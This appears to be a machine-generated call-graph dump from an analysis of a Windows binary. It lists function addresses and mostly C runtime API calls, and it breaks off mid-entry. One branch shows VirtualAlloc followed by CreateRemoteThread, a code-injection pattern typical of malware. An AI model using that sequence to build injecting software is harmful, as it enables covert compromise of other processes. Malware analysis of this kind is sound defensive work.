ab4f7b 16392->16393 16394 ab10b1 16392->16394 16393->16394 16399 ab5996 InitializeCriticalSectionEx 16393->16399 16396 ab5fe6 16394->16396 16400 ab5fb9 16396->16400 16399->16393 16401 ab5fc8 16400->16401 16402 ab5fcf 16400->16402 16406 abfef9 16401->16406 16409 abff76 16402->16409 16405 ab10bb 16407 abff76 45 API calls 16406->16407 16408 abff0b 16407->16408 16408->16405 16412 abfcc2 16409->16412 16413 abfcce __FrameHandler3::FrameUnwindToState 16412->16413 16420 abca85 EnterCriticalSection 16413->16420 16415 abfcdc 16421 abfd1d 16415->16421 16417 abfce9 16431 abfd11 16417->16431 16420->16415 16422 abfdab __purecall 16421->16422 16423 abfd38 16421->16423 16422->16417 16423->16422 16424 abfd8b 16423->16424 16434 ac9223 16423->16434 16424->16422 16426 ac9223 45 API calls 16424->16426 16428 abfda1 16426->16428 16427 abfd81 16429 ac0ac8 ___free_lconv_mon 14 API calls 16427->16429 16430 ac0ac8 ___free_lconv_mon 14 API calls 16428->16430 16429->16424 16430->16422 16462 abcacd LeaveCriticalSection 16431->16462 16433 abfcfa 16433->16405 16435 ac924b 16434->16435 16436 ac9230 16434->16436 16437 ac925a 16435->16437 16443 acb3bf 16435->16443 16436->16435 16438 ac923c 16436->16438 16450 ac5375 16437->16450 16440 abd381 __Wcrtomb 14 API calls 16438->16440 16442 ac9241 codecvt 16440->16442 16442->16427 16444 acb3df HeapSize 16443->16444 16445 acb3ca 16443->16445 16444->16437 16446 abd381 __Wcrtomb 14 API calls 16445->16446 16447 acb3cf 16446->16447 16448 aba48f __strnicoll 42 API calls 16447->16448 16449 acb3da 16448->16449 16449->16437 16451 ac538d 16450->16451 16452 ac5382 16450->16452 16454 ac5395 16451->16454 16460 ac539e _unexpected 16451->16460 16453 ac3c5d std::_Locinfo::_Locinfo_dtor 15 API calls 16452->16453 16458 ac538a 16453->16458 16455 ac0ac8 ___free_lconv_mon 14 API calls 16454->16455 16455->16458 16456 ac53c8 HeapReAlloc 16456->16458 16456->16460 16457 ac53a3 16459 abd381 __Wcrtomb 14 API calls 16457->16459 16458->16442 16459->16458 16460->16456 16460->16457 16461 abd8a9 codecvt 2 API calls 16460->16461 16461->16460 16462->16433 16467 ac92a2 16468 ac92bb 16467->16468 16469 ac92d9 16467->16469 16468->16469 16470 ac1851 2 API calls 16468->16470 16470->16468 16611 abb28d 16612 abbe34 ___scrt_uninitialize_crt 71 API calls 16611->16612 16613 abb295 16612->16613 16621 ac16b0 16613->16621 16615 abb29a 16631 ac175b 16615->16631 16618 abb2c4 16619 ac0ac8 ___free_lconv_mon 14 API calls 16618->16619 16620 abb2cf 16619->16620 16622 ac16bc __FrameHandler3::FrameUnwindToState 16621->16622 16635 abca85 EnterCriticalSection 16622->16635 16624 ac1733 16642 ac1752 16624->16642 16626 ac1707 DeleteCriticalSection 16629 ac0ac8 ___free_lconv_mon 14 API calls 16626->16629 16630 ac16c7 16629->16630 16630->16624 16630->16626 16636 abbaf9 16630->16636 16632 ac1772 16631->16632 16634 abb2a9 DeleteCriticalSection 16631->16634 16633 ac0ac8 ___free_lconv_mon 14 API calls 16632->16633 16632->16634 16633->16634 16634->16615 16634->16618 16635->16630 16637 abbb0c _Fputc 16636->16637 16645 abb9d4 16637->16645 16639 abbb18 16640 aba1cb _Fputc 42 API calls 16639->16640 16641 abbb24 16640->16641 16641->16630 16717 abcacd LeaveCriticalSection 16642->16717 16644 ac173f 16644->16615 16646 abb9e0 __FrameHandler3::FrameUnwindToState 16645->16646 16647 abb9ea 16646->16647 16648 abba0d 16646->16648 16649 aba412 _Fputc 42 API calls 16647->16649 16655 abba05 16648->16655 16656 abb2d9 EnterCriticalSection 16648->16656 16649->16655 16651 abba2b 16657 abba6b 16651->16657 16653 abba38 16671 abba63 16653->16671 16655->16639 16656->16651 16658 abba9b 16657->16658 16659 abba78 16657->16659 16661 abbd66 ___scrt_uninitialize_crt 67 API calls 16658->16661 16669 abba93 16658->16669 16660 aba412 _Fputc 42 API calls 16659->16660 16660->16669 16662 abbab3 16661->16662 16663 ac175b 14 API calls 16662->16663 16664 abbabb 16663->16664 16665 ac1af7 _Ungetc 42 API calls 16664->16665 16666 abbac7 16665->16666 16674 ac2554 16666->16674 16669->16653 16670 ac0ac8 ___free_lconv_mon 14 API calls 16670->16669 16716 abb2ed LeaveCriticalSection 16671->16716 16673 abba69 16673->16655 16675 ac257d 16674->16675 16676 abbace 16674->16676 16677 ac25cc 16675->16677 16679 ac25a4 16675->16679 16676->16669 16676->16670 16678 aba412 _Fputc 42 API calls 16677->16678 16678->16676 16681 ac24c3 16679->16681 16682 ac24cf __FrameHandler3::FrameUnwindToState 16681->16682 16689 ac6e10 EnterCriticalSection 16682->16689 16684 ac24dd 16685 ac250e 16684->16685 16690 ac25f7 16684->16690 16703 ac2548 16685->16703 16689->16684 16691 ac6ee7 ___scrt_uninitialize_crt 42 API calls 16690->16691 16693 ac2607 16691->16693 16692 ac260d 16706 ac6e56 16692->16706 16693->16692 16695 ac6ee7 ___scrt_uninitialize_crt 42 API calls 16693->16695 16702 ac263f 16693->16702 16697 ac2636 16695->16697 16696 ac6ee7 ___scrt_uninitialize_crt 42 API calls 16698 ac264b CloseHandle 16696->16698 16699 ac6ee7 ___scrt_uninitialize_crt 42 API calls 16697->16699 16698->16692 16700 ac2657 GetLastError 16698->16700 16699->16702 16700->16692 16701 ac2665 ___scrt_uninitialize_crt 16701->16685 16702->16692 16702->16696 16715 ac6e33 LeaveCriticalSection 16703->16715 16705 ac2531 16705->16676 16707 ac6ecc 16706->16707 16708 ac6e65 16706->16708 16709 abd381 __Wcrtomb 14 API calls 16707->16709 16708->16707 16713 ac6e8f 16708->16713 16710 ac6ed1 16709->16710 16711 abd36e __dosmaperr 14 API calls 16710->16711 16712 ac6ebc 16711->16712 16712->16701 16713->16712 16714 ac6eb6 SetStdHandle 16713->16714 16714->16712 16715->16705 16716->16673 16717->16644 16846 ab4a90 16847 ab4a9c __EH_prolog3_GS 16846->16847 16849 ab4aeb 16847->16849 16853 ab4ab3 16847->16853 16856 ab4b05 16847->16856 16848 ab5cfc std::_Throw_Cpp_error 5 API calls 16850 ab4bcf 16848->16850 16860 ab34ce 16849->16860 16853->16848 16855 ab21b0 std::_Throw_Cpp_error 42 API calls 16855->16853 16857 ab4bb4 16856->16857 16858 ab4bef 16856->16858 16863 ab2d20 16856->16863 16874 abbed9 16856->16874 16857->16855 16858->16857 16894 abc989 16858->16894 16907 abb471 16860->16907 16864 ab2d32 16863->16864 16865 ab2d54 16863->16865 16864->16856 16866 ab2e2f 16865->16866 16867 ab2d66 16865->16867 16868 ab2830 std::_Throw_Cpp_error 43 API calls 16866->16868 16870 ab1100 std::_Throw_Cpp_error 43 API calls 16867->16870 16872 ab2d9e codecvt 16868->16872 16869 aba49f std::_Throw_Cpp_error 42 API calls 16871 ab2e39 16869->16871 16870->16872 16872->16869 16873 ab2def std::ios_base::_Ios_base_dtor codecvt 16872->16873 16873->16856 16875 abbee5 __FrameHandler3::FrameUnwindToState 16874->16875 16876 abbeef 16875->16876 16877 abbf07 16875->16877 16878 abd381 __Wcrtomb 14 API calls 16876->16878 17044 abb2d9 EnterCriticalSection 16877->17044 16880 abbef4 16878->16880 16882 aba48f __strnicoll 42 API calls 16880->16882 16881 abbf11 16883 abbfad 16881->16883 16884 ac1af7 _Ungetc 42 API calls 16881->16884 16888 abbeff 16882->16888 17045 abbe92 16883->17045 16891 abbf2e 16884->16891 16886 abbfb3 17052 abbfdd 16886->17052 16888->16856 16889 abbf85 16890 abd381 __Wcrtomb 14 API calls 16889->16890 16892 abbf8a 16890->16892 16891->16883 16891->16889 16893 aba48f __strnicoll 42 API calls 16892->16893 16893->16888 16895 abc995 __FrameHandler3::FrameUnwindToState 16894->16895 16896 abc99c 16895->16896 16897 abc9b1 16895->16897 16898 abd381 __Wcrtomb 14 API calls 16896->16898 17056 abb2d9 EnterCriticalSection 16897->17056 16900 abc9a1 16898->16900 16902 aba48f __strnicoll 42 API calls 16900->16902 16901 abc9bb 17057 abc890 16901->17057 16904 abc9ac 16902->16904 16904->16858 16908 abb47d __FrameHandler3::FrameUnwindToState 16907->16908 16909 abb49b 16908->16909 16910 abb484 16908->16910 16920 abb2d9 EnterCriticalSection 16909->16920 16911 abd381 __Wcrtomb 14 API calls 16910->16911 16913 abb489 16911->16913 16915 aba48f __strnicoll 42 API calls 16913->16915 16914 abb4a7 16921 abb301 16914->16921 16917 ab34d9 16915->16917 16917->16853 16918 abb4b2 16955 abb4e0 16918->16955 16920->16914 16922 abb31e 16921->16922 16923 abb384 16921->16923 16924 ac1af7 _Ungetc 42 API calls 16922->16924 16926 abb37b 16923->16926 16927 ac1af7 _Ungetc 42 API calls 16923->16927 16925 abb324 16924->16925 16929 ac1af7 _Ungetc 42 API calls 16925->16929 16944 abb347 16925->16944 16926->16918 16928 abb399 16927->16928 16931 ac1af7 _Ungetc 42 API calls 16928->16931 16946 abb3bc 16928->16946 16930 abb330 16929->16930 16936 ac1af7 _Ungetc 42 API calls 16930->16936 16930->16944 16934 abb3a5 16931->16934 16932 abb362 16932->16926 16958 abbece 16932->16958 16933 abbece 42 API calls 16937 abb3dc 16933->16937 16939 ac1af7 _Ungetc 42 API calls 16934->16939 16934->16946 16938 abb33c 16936->16938 16937->16926 16965 abcd93 16937->16965 16941 ac1af7 _Ungetc 42 API calls 16938->16941 16942 abb3b1 16939->16942 16941->16944 16945 ac1af7 _Ungetc 42 API calls 16942->16945 16944->16923 16944->16932 16945->16946 16946->16926 16946->16933 16947 abb41e 16970 ac1ac0 16947->16970 16949 abbece 42 API calls 16951 abb405 16949->16951 16951->16947 16952 abb40b 16951->16952 16954 abc989 44 API calls 16952->16954 16953 abd381 __Wcrtomb 14 API calls 16953->16926 16954->16926 17043 abb2ed LeaveCriticalSection 16955->17043 16957 abb4e6 16957->16917 16959 abbe92 16958->16959 16960 abbeb3 16959->16960 16961 abd381 __Wcrtomb 14 API calls 16959->16961 16960->16932 16962 abbea3 16961->16962 16963 aba48f __strnicoll 42 API calls 16962->16963 16964 abbeae 16963->16964 16964->16932 16966 ac0590 __Getctype 42 API calls 16965->16966 16967 abcd9e 16966->16967 16968 ac09af __Getctype 42 API calls 16967->16968 16969 abb3f4 16968->16969 16969->16947 16969->16949 16971 ac1ad3 _Fputc 16970->16971 16976 ac198d 16971->16976 16974 aba1cb _Fputc 42 API calls 16975 abb432 16974->16975 16975->16926 16975->16953 16977 ac19a1 16976->16977 16985 ac19b1 16976->16985 16978 ac19d6 16977->16978 16977->16985 16988 abadd0 16977->16988 16980 ac1a0a 16978->16980 16981 ac19e7 16978->16981 16983 ac1a86 16980->16983 16984 ac1a32 16980->16984 16980->16985 16995 ac98ee 16981->16995 16986 ac53eb __strnicoll MultiByteToWideChar 16983->16986 16984->16985 16987 ac53eb __strnicoll MultiByteToWideChar 16984->16987 16985->16974 16986->16985 16987->16985 16998 aba276 16988->16998 17039 acb3f2 16995->17039 16999 aba289 16998->16999 17000 aba280 16998->17000 17005 ac09dc 16999->17005 17013 aba230 GetLastError 17000->17013 17002 aba285 17002->16999 17003 abb171 __purecall 42 API calls 17002->17003 17004 aba292 17003->17004 17006 abadfd 17005->17006 17007 ac09f3 17005->17007 17009 ac0a3a 17006->17009 17007->17006 17008 ac7efd __Getctype 42 API calls 17007->17008 17008->17006 17010 abae0a 17009->17010 17011 ac0a51 17009->17011 17010->16978 17011->17010 17012 ac655f __strnicoll 42 API calls 17011->17012 17012->17010 17014 aba249 17013->17014 17017 ac0792 17014->17017 17018 ac07a5 17017->17018 17023 ac07ab 17017->17023 17019 ac0ff4 __Getctype 6 API calls 17018->17019 17019->17023 17020 ac1033 __Getctype 6 API calls 17022 ac07c5 17020->17022 17021 aba261 SetLastError 17021->17002 17022->17021 17024 ac0a6b _unexpected 14 API calls 17022->17024 17023->17020 17023->17021 17025 ac07d5 17024->17025 17026 ac07dd 17025->17026 17027 ac07f2 17025->17027 17028 ac1033 __Getctype 6 API calls 17026->17028 17029 ac1033 __Getctype 6 API calls 17027->17029 17030 ac07e9 17028->17030 17031 ac07fe 17029->17031 17035 ac0ac8 ___free_lconv_mon 14 API calls 17030->17035 17032 ac0811 17031->17032 17033 ac0802 17031->17033 17034 ac03be __Getctype 14 API calls 17032->17034 17036 ac1033 __Getctype 6 API calls 17033->17036 17037 ac081c 17034->17037 17035->17021 17036->17030 17038 ac0ac8 ___free_lconv_mon 14 API calls 17037->17038 17038->17021 17040 acb41d _Fputc 17039->17040 17041 ab5a66 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 17040->17041 17042 ac9909 17041->17042 17042->16985 17043->16957 17044->16881 17046 abbe9e 17045->17046 17047 abbeb3 17045->17047 17048 abd381 __Wcrtomb 14 API calls 17046->17048 17047->16886 17049 abbea3 17048->17049 17050 aba48f __strnicoll 42 API calls 17049->17050 17051 abbeae 17050->17051 17051->16886 17055 abb2ed LeaveCriticalSection 17052->17055 17054 abbfe3 17054->16888 17055->17054 17056->16901 17058 abc8a8 17057->17058 17060 abc918 17057->17060 17059 ac1af7 _Ungetc 42 API calls 17058->17059 17064 abc8ae 17059->17064 17061 ac2467 _Ungetc 14 API calls 17060->17061 17062 abc910 17060->17062 17061->17062 17068 abc9f4 17062->17068 17063 abc900 17065 abd381 __Wcrtomb 14 API calls 17063->17065 17064->17060 17064->17063 17066 abc905 17065->17066 17067 aba48f __strnicoll 42 API calls 17066->17067 17067->17062 17071 abb2ed LeaveCriticalSection 17068->17071 17070 abc9fa 17070->16904 17071->17070 16151 ac1e92 16152 ac1af7 _Ungetc 42 API calls 16151->16152 16154 ac1e9f 16152->16154 16153 ac1eab 16154->16153 16155 ac1ef7 16154->16155 16174 ac2228 16154->16174 16155->16153 16162 ac1f59 16155->16162 16182 ac3b38 16155->16182 16163 ac2082 16162->16163 16164 ac1af7 _Ungetc 42 API calls 16163->16164 16165 ac2091 16164->16165 16166 ac20a4 16165->16166 16167 ac2137 16165->16167 16169 ac20c1 16166->16169 16171 ac20e8 16166->16171 16168 ac2f9f ___scrt_uninitialize_crt 67 API calls 16167->16168 16173 ac1f6a 16168->16173 16170 ac2f9f ___scrt_uninitialize_crt 67 API calls 16169->16170 16170->16173 16171->16173 16193 ac3a7c 16171->16193 16175 ac223e 16174->16175 16176 ac2242 16174->16176 16175->16155 16177 ac6ee7 ___scrt_uninitialize_crt 42 API calls 16176->16177 16181 ac2291 16176->16181 16178 ac2263 16177->16178 16179 ac226b SetFilePointerEx 16178->16179 16178->16181 16180 ac2282 GetFileSizeEx 16179->16180 16179->16181 16180->16181 16181->16155 16183 ac3b44 16182->16183 16184 ac1af7 _Ungetc 42 API calls 16183->16184 16187 ac1f4c 16183->16187 16185 ac3b5f 16184->16185 16221 aca462 16185->16221 16187->16162 16188 ac2467 16187->16188 16189 ac0a6b _unexpected 14 API calls 16188->16189 16190 ac2484 16189->16190 16191 ac0ac8 ___free_lconv_mon 14 API calls 16190->16191 16192 ac248e 16191->16192 16192->16162 16194 ac3a90 _Fputc 16193->16194 16199 ac38d3 16194->16199 16197 aba1cb _Fputc 42 API calls 16198 ac3ab4 16197->16198 16198->16173 16200 ac38df __FrameHandler3::FrameUnwindToState 16199->16200 16201 ac38e7 16200->16201 16202 ac39bd 16200->16202 16204 ac393b 16200->16204 16201->16197 16203 aba412 _Fputc 42 API calls 16202->16203 16203->16201 16210 ac6e10 EnterCriticalSection 16204->16210 16206 ac3941 16207 ac3966 16206->16207 16211 ac39f9 16206->16211 16217 ac39b5 16207->16217 16210->16206 16212 ac6ee7 ___scrt_uninitialize_crt 42 API calls 16211->16212 16213 ac3a0b 16212->16213 16214 ac3a27 SetFilePointerEx 16213->16214 16216 ac3a13 ___scrt_uninitialize_crt 16213->16216 16215 ac3a3f GetLastError 16214->16215 16214->16216 16215->16216 16216->16207 16220 ac6e33 LeaveCriticalSection 16217->16220 16219 ac39bb 16219->16201 16220->16219 16222 aca47c 16221->16222 16223 aca46f 16221->16223 16226 aca488 16222->16226 16227 abd381 __Wcrtomb 14 API calls 16222->16227 16224 abd381 __Wcrtomb 14 API calls 16223->16224 16225 aca474 16224->16225 16225->16187 16226->16187 16228 aca4a9 16227->16228 16229 aba48f __strnicoll 42 API calls 16228->16229 16229->16225 18489 ab49f0 18490 ab49ff 18489->18490 18492 ab4a23 18490->18492 18493 abc856 18490->18493 18494 abc869 _Fputc 18493->18494 18499 abc78d 18494->18499 18496 abc87e 18497 aba1cb _Fputc 42 API calls 18496->18497 18498 abc88b 18497->18498 18498->18492 18500 abc79f 18499->18500 18501 abc7c2 18499->18501 18502 aba412 _Fputc 42 API calls 18500->18502 18501->18500 18504 abc7e9 18501->18504 18503 abc7ba 18502->18503 18503->18496 18507 abc692 18504->18507 18508 abc69e __FrameHandler3::FrameUnwindToState 18507->18508 18515 abb2d9 EnterCriticalSection 18508->18515 18510 abc6ac 18516 abc6ed 18510->18516 18512 abc6b9 18525 abc6e1 18512->18525 18515->18510 18517 abbd66 ___scrt_uninitialize_crt 67 API calls 18516->18517 18518 abc708 18517->18518 18519 ac175b 14 API calls 18518->18519 18520 abc712 18519->18520 18521 ac0a6b _unexpected 14 API calls 18520->18521 18524 abc72d 18520->18524 18522 abc751 18521->18522 18523 ac0ac8 ___free_lconv_mon 14 API calls 18522->18523 18523->18524 18524->18512 18528 abb2ed LeaveCriticalSection 18525->18528 18527 abc6ca 18527->18496 18528->18527 17157 abe8cb 17160 abe597 17157->17160 17161 abe5a3 __FrameHandler3::FrameUnwindToState 17160->17161 17168 abca85 EnterCriticalSection 17161->17168 17163 abe5db 17169 abe5f9 17163->17169 17165 abe5ad 17165->17163 17167 ac7f7e __Getctype 14 API calls 17165->17167 17167->17165 17168->17165 17172 abcacd LeaveCriticalSection 17169->17172 17171 abe5e7 17172->17171 15853 ab2ed0 15854 ab1100 std::_Throw_Cpp_error 43 API calls 15853->15854 15855 ab2f01 15854->15855 15856 ab5a28 codecvt 3 API calls 15855->15856 15857 ab2f46 15856->15857 15858 ab2f59 std::ios_base::_Ios_base_dtor 15857->15858 15887 ab17b0 15857->15887 15860 ab2f71 VirtualAlloc 15858->15860 15861 ab2fa2 15860->15861 15864 ab3016 std::ios_base::_Ios_base_dtor codecvt 15861->15864 15899 ab12f0 15861->15899 15863 ab30dc 15865 aba49f std::_Throw_Cpp_error 42 API calls 15863->15865 15864->15863 15873 ab22a0 15864->15873 15868 ab30e1 15865->15868 15869 ab30a2 15869->15863 15870 ab30bf std::ios_base::_Ios_base_dtor 15869->15870 15871 ab5a66 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 15870->15871 15872 ab30d8 15871->15872 15874 ab5a28 codecvt 3 API calls 15873->15874 15883 ab22d2 std::ios_base::_Ios_base_dtor 15874->15883 15875 ab253b std::ios_base::_Ios_base_dtor 15877 ab5a66 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 15875->15877 15878 ab256a CreateRemoteThread WaitForSingleObject 15877->15878 15878->15869 15878->15870 15880 ab2576 15942 ab2820 15880->15942 15881 ab5a28 codecvt 3 API calls 15881->15883 15883->15875 15883->15880 15883->15881 15885 ab2571 15883->15885 15916 ab1250 15883->15916 15924 ab1540 15883->15924 15886 aba49f std::_Throw_Cpp_error 42 API calls 15885->15886 15886->15880 15888 ab1c22 15887->15888 15895 ab17dd std::ios_base::_Ios_base_dtor codecvt 15887->15895 15889 ab5a66 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 15888->15889 15890 ab1c33 15889->15890 15890->15858 15891 ab1c3e 15892 ab2830 std::_Throw_Cpp_error 43 API calls 15891->15892 15894 ab1c43 15892->15894 15893 abaefe 45 API calls 15893->15895 15895->15888 15895->15891 15895->15893 15896 ab1100 43 API calls std::_Throw_Cpp_error 15895->15896 15897 ab1c39 15895->15897 15896->15895 15898 aba49f std::_Throw_Cpp_error 42 API calls 15897->15898 15898->15891 15900 ab139d codecvt 15899->15900 15901 ab1342 15899->15901 15904 aba49f std::_Throw_Cpp_error 42 API calls 15900->15904 15915 ab144f std::ios_base::_Ios_base_dtor 15900->15915 15902 ab1484 15901->15902 15905 ab138c 15901->15905 15908 ab13b9 15901->15908 15903 ab2800 std::_Throw_Cpp_error RaiseException 15902->15903 15903->15900 15906 ab1493 15904->15906 15905->15902 15907 ab1397 15905->15907 16146 ab2a30 15906->16146 15911 ab5a28 codecvt 3 API calls 15907->15911 15908->15900 15909 ab5a28 codecvt 3 API calls 15908->15909 15909->15900 15911->15900 15912 ab14a1 15913 ab687d CallUnexpected RaiseException 15912->15913 15914 ab14aa 15913->15914 15915->15861 15917 ab12e5 15916->15917 15921 ab1264 15916->15921 15918 ab2830 std::_Throw_Cpp_error 43 API calls 15917->15918 15920 ab12ea 15918->15920 15919 ab1269 codecvt 15919->15883 15921->15919 15945 ab1160 15921->15945 15923 ab12bb codecvt 15923->15883 15925 ab1582 15924->15925 15967 ab20f0 15925->15967 15927 ab15a4 15928 ab16c2 15927->15928 15933 ab16fb std::ios_base::_Init 15927->15933 15975 ab328a 15928->15975 15930 ab159e 15930->15927 15972 ab2eb0 15930->15972 15932 ab16c7 15935 ab16d5 15932->15935 15979 ab2770 15932->15979 15983 ab2000 15933->15983 15935->15883 15937 ab172f 15938 ab687d CallUnexpected RaiseException 15937->15938 15939 ab173d 15938->15939 15997 ab32e4 GetCurrentThreadId 15939->15997 15941 ab175e std::ios_base::_Ios_base_dtor 15941->15883 15943 ab324a std::_Xinvalid_argument 43 API calls 15942->15943 15944 ab282a 15943->15944 15946 ab11b3 15945->15946 15947 ab1170 15945->15947 15950 ab2800 std::_Throw_Cpp_error RaiseException 15946->15950 15948 ab1179 15947->15948 15949 ab119c 15947->15949 15948->15946 15952 ab1180 15948->15952 15953 ab11ad 15949->15953 15956 ab5a28 codecvt 3 API calls 15949->15956 15951 ab1186 15950->15951 15954 aba49f std::_Throw_Cpp_error 42 API calls 15951->15954 15959 ab118f 15951->15959 15955 ab5a28 codecvt 3 API calls 15952->15955 15953->15923 15957 ab11bd 15954->15957 15955->15951 15958 ab11a6 15956->15958 15960 ab1249 15957->15960 15963 ab11d0 15957->15963 15958->15923 15959->15923 15961 ab2830 std::_Throw_Cpp_error 43 API calls 15960->15961 15962 ab124e 15961->15962 15964 ab11d5 codecvt 15963->15964 15965 ab1100 std::_Throw_Cpp_error 43 API calls 15963->15965 15964->15923 15966 ab1223 codecvt 15965->15966 15966->15923 15968 ab2107 15967->15968 15969 ab211b 15968->15969 16005 ab2af0 15968->16005 15969->15930 16019 ab4e24 15972->16019 15975->15932 15976 ab7220 15975->15976 16117 ab8ecc 15976->16117 15978 ab7225 15978->15932 15980 ab27d3 15979->15980 15981 ab27ae 15979->15981 15980->15935 15981->15980 16127 ab2e40 15981->16127 15984 ab2040 15983->15984 15984->15984 15985 ab11c0 std::ios_base::_Init 43 API calls 15984->15985 15986 ab2054 15985->15986 15987 ab1c80 std::_Throw_Cpp_error 43 API calls 15986->15987 15988 ab2062 15987->15988 15990 ab20b1 15988->15990 15992 ab208a std::ios_base::_Ios_base_dtor 15988->15992 15989 ab5a66 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 15991 ab20ab 15989->15991 15993 aba49f std::_Throw_Cpp_error 42 API calls 15990->15993 15991->15937 15992->15989 15994 ab20b6 15993->15994 15995 ab67fb ___std_exception_copy 42 API calls 15994->15995 15996 ab20e1 15995->15996 15996->15937 16134 ab500f 15997->16134 15999 ab3361 16141 ab501b 15999->16141 16002 ab32fd 16002->15999 16137 ab4f39 16002->16137 16140 ab4f57 WakeAllConditionVariable 16002->16140 16006 ab2b31 16005->16006 16012 ab2137 16005->16012 16007 ab20f0 51 API calls 16006->16007 16008 ab2b3a 16007->16008 16009 ab2bb2 16008->16009 16014 ab2bec std::ios_base::_Init 16008->16014 16010 ab328a 8 API calls 16009->16010 16011 ab2bb7 16010->16011 16011->16012 16013 ab2770 43 API calls 16011->16013 16012->15930 16013->16012 16015 ab2000 std::ios_base::_Init 43 API calls 16014->16015 16016 ab2c1e 16015->16016 16017 ab687d CallUnexpected RaiseException 16016->16017 16018 ab2c2c 16017->16018 16022 ab4e39 16019->16022 16023 ab2ec3 16022->16023 16024 ab4e5f codecvt 16022->16024 16023->15927 16024->16023 16026 ab46a8 16024->16026 16027 ab46ca 16026->16027 16028 ab46d3 16026->16028 16029 ab5a66 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 16027->16029 16028->16027 16030 ab4713 16028->16030 16033 ab4739 16028->16033 16031 ab4735 16029->16031 16038 ab34f5 16030->16038 16031->16024 16034 ab4794 16033->16034 16035 ab4775 16033->16035 16034->16027 16041 abc658 16034->16041 16035->16027 16037 ab34f5 _Fputc 46 API calls 16035->16037 16037->16027 16047 abb6e4 16038->16047 16042 abc66b _Fputc 16041->16042 16090 abc437 16042->16090 16044 abc680 16045 aba1cb _Fputc 42 API calls 16044->16045 16046 abc68d 16045->16046 16046->16027 16048 abb6f7 _Fputc 16047->16048 16053 abb4e8 16048->16053 16051 aba1cb _Fputc 42 API calls 16052 ab3503 16051->16052 16052->16027 16054 abb4f4 __FrameHandler3::FrameUnwindToState 16053->16054 16055 abb4fb 16054->16055 16056 abb520 16054->16056 16057 aba412 _Fputc 42 API calls 16055->16057 16064 abb2d9 EnterCriticalSection 16056->16064 16063 abb516 16057->16063 16059 abb52f 16065 abb5ac 16059->16065 16063->16051 16064->16059 16066 abb5e3 16065->16066 16067 abb5d1 _Fputc 16065->16067 16068 ac1af7 _Ungetc 42 API calls 16066->16068 16071 ab5a66 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 16067->16071 16069 abb5ea 16068->16069 16070 ac1af7 _Ungetc 42 API calls 16069->16070 16074 abb612 16069->16074 16072 abb5fb 16070->16072 16073 abb540 16071->16073 16072->16074 16076 ac1af7 _Ungetc 42 API calls 16072->16076 16087 abb570 16073->16087 16074->16067 16075 ac1af7 _Ungetc 42 API calls 16074->16075 16077 abb645 16075->16077 16078 abb607 16076->16078 16080 ac1af7 _Ungetc 42 API calls 16077->16080 16086 abb668 16077->16086 16079 ac1af7 _Ungetc 42 API calls 16078->16079 16079->16074 16082 abb651 16080->16082 16081 ac22c3 _Fputc 44 API calls 16081->16067 16083 ac1af7 _Ungetc 42 API calls 16082->16083 16082->16086 16084 abb65d 16083->16084 16085 ac1af7 _Ungetc 42 API calls 16084->16085 16085->16086 16086->16067 16086->16081 16088 abb2ed Concurrency::cancel_current_task LeaveCriticalSection 16087->16088 16089 abb576 16088->16089 16089->16063 16091 abc445 16090->16091 16097 abc46d 16090->16097 16092 abc452 16091->16092 16093 abc474 16091->16093 16091->16097 16094 aba412 _Fputc 42 API calls 16092->16094 16098 abc390 16093->16098 16094->16097 16097->16044 16099 abc39c __FrameHandler3::FrameUnwindToState 16098->16099 16106 abb2d9 EnterCriticalSection 16099->16106 16101 abc3aa 16107 abc3eb 16101->16107 16106->16101 16108 ac3b73 43 API calls 16107->16108 16109 abc403 16108->16109 16110 abc4ae 67 API calls 16109->16110 16111 abc421 16110->16111 16112 ac3c1f 67 API calls 16111->16112 16113 abc3b7 16112->16113 16114 abc3df 16113->16114 16115 abb2ed Concurrency::cancel_current_task LeaveCriticalSection 16114->16115 16116 abc3c8 16115->16116 16116->16044 16118 ab8ed8 GetLastError 16117->16118 16119 ab8ed5 16117->16119 16122 aba043 16118->16122 16119->15978 16123 ab9ee2 ___vcrt_FlsSetValue 5 API calls 16122->16123 16124 aba05d 16123->16124 16125 aba075 TlsGetValue 16124->16125 16126 ab8eed SetLastError 16124->16126 16125->16126 16126->15978 16130 ab29b0 16127->16130 16131 ab29cd 16130->16131 16132 ab29c4 std::ios_base::_Init 16130->16132 16131->15980 16132->16131 16133 ab2000 std::ios_base::_Init 43 API calls 16132->16133 16144 ab59ab EnterCriticalSection 16134->16144 16136 ab5019 16136->16002 16138 ab4f53 16137->16138 16139 ab4f45 ReleaseSRWLockExclusive 16137->16139 16138->16002 16139->16138 16140->16002 16145 ab59b9 LeaveCriticalSection 16141->16145 16143 ab3369 16143->15941 16144->16136 16145->16143 16147 ab2a47 16146->16147 16148 ab2a57 std::ios_base::_Ios_base_dtor 16146->16148 16147->16148 16149 aba49f std::_Throw_Cpp_error 42 API calls 16147->16149 16148->15912 16150 ab2a6b 16149->16150 16150->15912 18547 ab47d5 18548 ab47ef 18547->18548 18549 ab4801 18548->18549 18551 ab3512 18548->18551 18554 abb956 18551->18554 18555 abb962 __FrameHandler3::FrameUnwindToState 18554->18555 18556 abb969 18555->18556 18557 abb980 18555->18557 18559 abd381 __Wcrtomb 14 API calls 18556->18559 18567 abb2d9 EnterCriticalSection 18557->18567 18561 abb96e 18559->18561 18560 abb98f 18568 abb8a0 18560->18568 18563 aba48f __strnicoll 42 API calls 18561->18563 18565 ab3524 18563->18565 18564 abb99d 18582 abb9cc 18564->18582 18565->18549 18567->18560 18569 abb940 _Ungetc 18568->18569 18570 abb8b6 18568->18570 18569->18564 18570->18569 18571 abb8e4 18570->18571 18572 ac2467 _Ungetc 14 API calls 18570->18572 18571->18569 18573 ac1af7 _Ungetc 42 API calls 18571->18573 18572->18571 18574 abb8f6 18573->18574 18575 abb919 18574->18575 18576 ac1af7 _Ungetc 42 API calls 18574->18576 18575->18569 18585 abb793 18575->18585 18577 abb902 18576->18577 18577->18575 18579 ac1af7 _Ungetc 42 API calls 18577->18579 18580 abb90e 18579->18580 18581 ac1af7 _Ungetc 42 API calls 18580->18581 18581->18575 18614 abb2ed LeaveCriticalSection 